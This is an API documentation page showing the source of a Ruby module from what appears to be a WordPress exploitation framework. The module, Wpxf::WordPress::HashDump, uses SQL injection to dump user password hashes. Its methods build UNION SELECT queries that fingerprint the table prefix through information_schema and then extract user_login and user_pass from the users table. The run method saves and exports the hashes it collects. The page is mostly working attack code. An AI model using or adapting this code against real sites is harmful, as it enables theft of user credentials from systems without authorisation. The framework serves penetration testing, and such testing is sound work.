Module: Wpxf::WordPress::HashDump

Includes:
Wpxf
Defined in:
lib/wpxf/wordpress/hash_dump.rb

Overview

Provides reusable functionality for hash dump modules.

Instance Method Summary collapse

Instance Method Details

#export_pathString

Returns the path to export the hash dump to.

Returns:

  • (String)

    the path to export the hash dump to.



30
31
32
33
 
# File 'lib/wpxf/wordpress/hash_dump.rb', line 30

def export_path
  return nil if normalized_option_value('export_path').nil?
  File.expand_path normalized_option_value('export_path')
end

#hashdump_custom_union_valuesArray

Returns an array of values to use in the generated union statement.

Returns:

  • (Array)

    an array of values to use in the generated union statement.



41
42
43
 
# File 'lib/wpxf/wordpress/hash_dump.rb', line 41

def hashdump_custom_union_values
  []
end

#hashdump_number_of_colsInteger

Returns the number of columns in the vulnerable SQL statement.

Returns:

  • (Integer)

    the number of columns in the vulnerable SQL statement.



73
74
75
 
# File 'lib/wpxf/wordpress/hash_dump.rb', line 73

def hashdump_number_of_cols
  1
end

#hashdump_prefix_fingerprint_statementString

Returns a unique select statement that can be used to fingerprint the database prefix.

Returns:

  • (String)

    a unique select statement that can be used to fingerprint the database prefix.



57
58
59
60
61
62
63
64
65
 
# File 'lib/wpxf/wordpress/hash_dump.rb', line 57

def hashdump_prefix_fingerprint_statement
  cols = _hashdump_union_cols
  cols[hashdump_visible_field_index] = "concat(#{_bof_token},0x3a,table_name,0x3a,#{_eof_token})"

  query = "select #{cols.join(',')} from information_schema.tables where table_schema = database()"
  return query unless reveals_one_row_per_request

  "#{query} limit #{_current_row},1"
end

#hashdump_request_bodyHash, String

Returns the body to be used when requesting the hash dump.

Returns:

  • (Hash, String)

    the body to be used when requesting the hash dump.



88
89
90
 
# File 'lib/wpxf/wordpress/hash_dump.rb', line 88

def hashdump_request_body
  nil
end

#hashdump_request_methodSymbol

Returns the HTTP method to use when requesting the hash dump.

Returns:

  • (Symbol)

    the HTTP method to use when requesting the hash dump.



78
79
80
 
# File 'lib/wpxf/wordpress/hash_dump.rb', line 78

def hashdump_request_method
  :get
end

#hashdump_request_paramsHash

Returns the parameters to be used when requesting the hash dump.

Returns:

  • (Hash)

    the parameters to be used when requesting the hash dump.



83
84
85
 
# File 'lib/wpxf/wordpress/hash_dump.rb', line 83

def hashdump_request_params
  nil
end

#hashdump_sql_statementString

Returns a unique SQL select statement that can be used to extract the hashes.

Returns:

  • (String)

    a unique SQL select statement that can be used to extract the hashes.



46
47
48
49
50
51
52
53
54
 
# File 'lib/wpxf/wordpress/hash_dump.rb', line 46

def hashdump_sql_statement
  cols = _hashdump_union_cols
  cols[hashdump_visible_field_index] = "concat(#{_bof_token},0x3a,user_login,0x3a,user_pass,0x3a,#{_eof_token})"

  query = "select #{cols.join(',')} from #{table_prefix}users"
  return query unless reveals_one_row_per_request

  "#{query} limit #{_current_row},1"
end

#hashdump_visible_field_indexInteger

Returns the zero-based index of the column which is visible in the response output.

Returns:

  • (Integer)

    the zero-based index of the column which is visible in the response output.



68
69
70
 
# File 'lib/wpxf/wordpress/hash_dump.rb', line 68

def hashdump_visible_field_index
  0
end

#initializeObject

Initialises a new instance of Wpxf::WordPress::HashDump



8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
 
# File 'lib/wpxf/wordpress/hash_dump.rb', line 8

def initialize
  super

  _update_info_without_validation(
    desc: %(
      This module exploits an SQL injection vulnerability to generate
      a dump of all the user hashes in the database.
    )
  )

  register_options([
    StringOption.new(
      name: 'export_path',
      desc: 'The file to save the hash dump to',
      required: false
    )
  ])

  _generate_id_tokens
end

#reveals_one_row_per_requestBoolean

Returns true if only one row of the SQL query will be displayed per request.

Returns:

  • (Boolean)

    returns true if only one row of the SQL query will be displayed per request.



36
37
38
 
# File 'lib/wpxf/wordpress/hash_dump.rb', line 36

def reveals_one_row_per_request
  false
end

#runBoolean

Run the module.

Returns:

  • (Boolean)

    true if successful.



104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
 
# File 'lib/wpxf/wordpress/hash_dump.rb', line 104

def run
  return false unless super

  @_current_row = 0
  emit_info 'Determining database prefix...'
  return false unless _determine_prefix
  emit_success "Found prefix: #{table_prefix}", true

  @_current_row = 0
  emit_info 'Dumping user hashes...'
  hashes = _dump_and_parse_hashes.uniq
  _output_hashdump_table(hashes)

  _save_hashes(hashes)
  _export_hashes(hashes) if export_path
  true
end

#table_prefixString

Returns the table prefix determined by the module.

Returns:

  • (String)

    the table prefix determined by the module.



98
99
100
 
# File 'lib/wpxf/wordpress/hash_dump.rb', line 98

def table_prefix
  @table_prefix
end

#vulnerable_urlString

Returns the URL of the vulnerable page.

Returns:

  • (String)

    the URL of the vulnerable page.



93
94
95
 
# File 'lib/wpxf/wordpress/hash_dump.rb', line 93

def vulnerable_url
  nil
end